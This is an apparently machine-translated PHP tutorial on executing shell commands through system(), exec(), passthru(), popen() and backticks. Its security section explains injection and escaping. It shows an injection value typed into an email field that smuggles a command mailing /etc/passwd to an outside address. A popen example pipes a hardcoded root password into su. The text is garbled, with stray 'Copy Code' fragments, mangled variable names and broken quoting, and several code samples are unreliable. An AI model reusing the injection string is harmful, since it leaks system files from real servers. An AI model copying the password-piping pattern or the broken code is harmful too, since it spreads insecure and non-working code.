PHP function System|exec|passthru Usage

System ("/usr/local/bin/webalizer/webalizer"); Copy Code EXEC () Prototype: string exec (String command [, string array [, int return_var]]) the EXEC () function is similar to System (), executes the given command but does not output the result, but returns the last Yes. Although it returns only the last line of the command result, the second parameter array gives the complete result by appending the result line to the end of the array. So if the array is not empty, it is best to clear it with unset () before calling it. The third parameter can be used to obtain the status code of the command execution only if the second parameter is specified. Example: EXEC ("/bin/ls-l"); EXEC ("/bin/ls-l", $res); EXEC ("/bin/ls-l", $res, $RC); Copy Code PassThru () Prototype: void PassThru (String command [, int return_var]) PassThru () invokes only the command, does not return any results, but outputs the result of the command directly to the standard output device. So the PassThru () function is often used to invoke programs such as Pbmplus (a tool for processing pictures under Unix, a stream of output binary raw images). It can also get the status code of the command execution. Example: Header ("Content-type:image/gif"); PassThru ("./ppmtogif hunte.ppm"); Copy Code 2) Open the process with the Popen () function The method above can simply execute the command, but cannot interact with the command. But sometimes you have to enter something into the command, such as when adding Linux system users, to call Su to change the current user to root, and the SU command must enter the root password on the command line. In this case, it is obviously not possible to use the method mentioned above. The Popen () function opens a process pipeline to execute the given command, returning a file handle. Now that you have returned a file handle, you can read and write to it. In PhP3, the handle can only be done in a single mode of operation, either written or read, and starting from PHP4, you can read and write at the same time. Unless the handle is opened in a pattern (read or write), you must call the Pclose () function to close it. Example 1: $FP =popen ("/bin/ls-l", "R"); Copy Code Example 2 /* How to add a system user in PHP Here is a routine that adds a user named James, The root password is verygood. For reference only */ $sucommand = "Su--login root--command"; $useradd = "Useradd"; $ROOTPASSWD = "Verygood"; $user = "James"; $user _add = sprintf ("%s"%s "%s", $sucommand, $useradd, $user); $fp = @popen ($user _add, "w"); @fputs ($fp, $ROOTPASSWD); @pclose ($FP); ?> Copy Code 3) Use the anti-apostrophe (', that is, the one below the ESC key on the keyboard, and ~ on the same top) This method has not previously been included in the PHP document, as a trick. The method is simple, use two anti-apostrophes to enclose the command to be executed as an expression, and the value of the expression is the result of the command execution. For example: $res = '/bin/ls-l '; Echo ' '. $res. ' '; Copy Code The output of this script: Hunte.gif hunte.ppm jpg.htm jpg.jpg passthru.php what to consider? There are two issues to consider: security and timeouts. Look at security first. For example, you have a small online store, so the list of products you can sell is placed in a file. You write an HTML file with a form, let your users enter their email address, and then send the product list to them. Assuming you're not using PHP's Mail () function (or you've never heard of it), you're going to call the Linux/unix system's mail program to send the file. The program is like this: System ("Mail $to < products.txt"); echo "Our catalogue has been sent to your mailbox: $to"; With this code, there is no danger to the average user, but there is actually a very big security hole. If a malicious user enters such an email address: '--bla; Mail someone@domain.com </etc/passwd; ' Copy Code Then this command eventually becomes: ' Mail--bla; Mail someone@domain.com </etc/passwd; < Products.txt ' Copy Code No matter which network manager sees such a command, it will scare out a cold sweat. PHP provides two functions: Escapeshellcmd () and Escapeshellarg (). The Escapeshellcmd function escapes all characters in a string that may be hidden from the shell and execute another command. These characters have special meanings in the shell, like semicolons (), redirects (>), and reads from files (<). The function escapeshellarg is used to handle the arguments of the command. It adds single quotes around the given string and escapes the single quotes in the string so that the string can be safely used as a parameter to the command. Timeout issue. If the command to be executed takes a long time, then the command should be placed in the background of the system to run. However, by default, functions like system () wait until the command finishes running before returning (in effect, waiting for the output of the command), which will definitely cause the PHP script to time out. Workaround: Redirect the output of the command to another file or stream. For example: System ("/usr/local/bin/order_proc >/tmp/null &"); Copy Code

